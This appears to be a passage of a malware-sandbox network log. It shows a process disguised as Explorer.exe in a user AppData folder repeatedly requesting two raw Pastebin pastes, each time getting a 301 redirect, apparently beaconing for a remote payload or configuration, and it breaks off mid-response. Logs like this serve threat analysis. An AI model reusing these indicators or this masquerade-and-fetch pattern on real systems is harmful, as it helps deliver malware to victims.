                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:14:02.907685995 CET74OUTGET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:14:04.005120993 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:03 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:03 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5418dfc607274-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            20192.168.2.549988172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:14:04.131097078 CET74OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:14:05.225503922 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:05 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:05 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef541959dd67d16-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            21192.168.2.550010172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:14:12.035274029 CET74OUTGET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:14:13.143537998 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:12 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:12 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef541c70994431a-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                            Dec 9, 2024 14:14:13.145534039 CET50OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:14:13.573201895 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:13 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:13 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef541c92c02431a-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            22192.168.2.550021172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:14:18.720252991 CET74OUTGET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:14:19.818943024 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:19 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:19 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef541f0c87b41b2-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                            Dec 9, 2024 14:14:19.825155973 CET50OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:14:20.148924112 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:19 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:19 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef541f2eb0b41b2-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            23192.168.2.550023172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:14:25.289118052 CET50OUTGET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:14:26.385080099 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:26 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:26 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef54219df960f74-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            24192.168.2.550025172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:14:26.752990961 CET74OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:14:27.842161894 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:27 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:27 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef54222fb7a8cd7-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            25192.168.2.550026172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:14:33.110985041 CET74OUTGET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:14:34.202969074 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:34 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:34 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5424ab8a8421d-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                            Dec 9, 2024 14:14:34.203576088 CET50OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:14:34.525414944 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:34 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:34 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5424cbb56421d-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            26192.168.2.550028172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:14:39.657366991 CET74OUTGET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:14:40.757745028 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:40 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:40 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef54273af6cc35f-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                            Dec 9, 2024 14:14:40.758641958 CET50OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:14:41.078350067 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:40 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:40 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef54275b8cac35f-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            27192.168.2.550030172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:14:46.205348015 CET74OUTGET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:14:47.302575111 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:47 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:47 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5429c991318c8-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                            Dec 9, 2024 14:14:47.313771963 CET50OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:14:47.635365009 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:47 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:47 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5429eaaa418c8-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            28192.168.2.550033172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:14:52.955337048 CET74OUTGET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:14:54.061490059 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:53 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:53 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef542c6c8397c6f-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                            Dec 9, 2024 14:14:54.066740990 CET50OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:14:54.387803078 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:54 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:54 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef542c8ea537c6f-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            29192.168.2.550036172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:14:59.594583988 CET74OUTGET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:15:00.693474054 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:15:00 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:15:00 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef542f04f254364-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                            Dec 9, 2024 14:15:00.699105024 CET50OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:15:01.053045988 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:15:00 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
